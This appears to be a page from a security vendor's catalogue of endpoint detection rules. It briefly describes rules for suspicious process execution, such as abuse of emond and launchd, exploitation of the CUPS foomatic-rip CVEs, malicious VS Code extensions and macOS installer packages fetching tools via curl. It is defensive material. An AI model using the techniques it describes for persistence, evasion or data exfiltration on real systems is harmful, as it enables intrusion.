EXPLORE DETECTIONS
Suspicious Emond Child Process
Identifies the execution of a suspicious child process of the Event Monitor Daemon (emond). Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.
Suspicious Endpoint Security Parent Process
A suspicious Endpoint Security parent process was detected. This may indicate a process hollowing or other form of code injection.
Suspicious Execution from a Mounted Device
Identifies when a script interpreter or signed binary is launched via a non-standard working directory. An attacker may use this technique to evade defenses.
Suspicious Execution from a WebDav Share
Identifies attempt to execute Windows scripts from a remote WebDav Share. Adversaries may abuse this method to evade dropping malicious files to victim file system.
Suspicious Execution from Foomatic-rip or Cupsd Parent
This detection rule addresses multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177. Specifically, this rule detects suspicious process command lines executed by child processes of foomatic-rip and cupsd. These flaws impact components like cups-browsed, libcupsfilters, libppd, and foomatic-rip, allowing remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing. This can result in arbitrary command execution when a print job is initiated.
Suspicious Execution from INET Cache
Identifies the execution of a process with arguments pointing to the INetCache Folder. Adversaries may deliver malicious content via WININET during initial access.
Suspicious Execution from VS Code Extension
Detects suspicious process execution launched from a VS Code extension context (parent command line contains .vscode/extensions). Malicious extensions can run on startup and drop or execute payloads (e.g. RATs like ScreenConnect, script interpreters, or download utilities). This covers both script/LOLBin children and recently created executables from non-Program Files paths, as seen in campaigns such as the fake Clawdbot extension that installed ScreenConnect RAT.
Suspicious Execution via Microsoft Office Add-Ins
Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In.
Suspicious Execution via Scheduled Task
Identifies execution of a suspicious program via scheduled tasks by looking at process lineage and command line usage.
Suspicious Execution via Windows Subsystem for Linux
Detects Linux Bash commands from the the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.
Suspicious Execution with NodeJS
Identifies suspicious execution patterns using NodeJS interpeter like process path and arguments.
Suspicious Explorer Child Process
Identifies a suspicious Windows explorer child process. Explorer.exe can be abused to launch malicious scripts or executables from a trusted parent process.
Suspicious File Creation via Kworker
This rule monitors for a file creation event originating from a kworker parent process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.
Suspicious File Creation via Pkg Install Script
Detects when an installer package executes a pre or post install script that immediately copies a file to suspicious locations on the filesystem. This activity is not common and usually indicates a malicious package attempting to install persistence or establish a working directory for malware.
Suspicious File Downloaded from Google Drive
Identifies suspicious file download activity from a Google Drive URL. This could indicate an attempt to deliver phishing payloads via a trusted webservice.
Suspicious File Made Executable via Chmod Inside A Container
This rule detects when chmod or chown are used to add the execute permission to a file in a world-writeable directory, and inside of a container. Modifying file permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized or malicious code inside the container.
Suspicious File Renamed via SMB
Identifies an incoming SMB connection followed by a suspicious file rename operation. This may indicate a remote ransomware attack via the SMB protocol.
Suspicious Hidden Child Process of Launchd
Identifies the execution of a launchd child process with a hidden file. An adversary can establish persistence by installing a new logon item, launch agent, or daemon that executes upon login.
Suspicious HTML File Creation
Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.
Suspicious Image Load (taskschd.dll) from MS Office
Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.
Suspicious ImagePath Service Creation
Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation.
Suspicious Installer Package Spawns Network Event
Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package.
Suspicious Inter-Process Communication via Outlook
Detects Inter-Process Communication with Outlook via Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or send email on their behalf via API.
Suspicious Interpreter Execution Detected via Defend for Containers
This rule detects when an interactive process executes a suspicious interpreter command inside a container. These commands are commonly used by attackers to execute malicious code or exfiltrate data.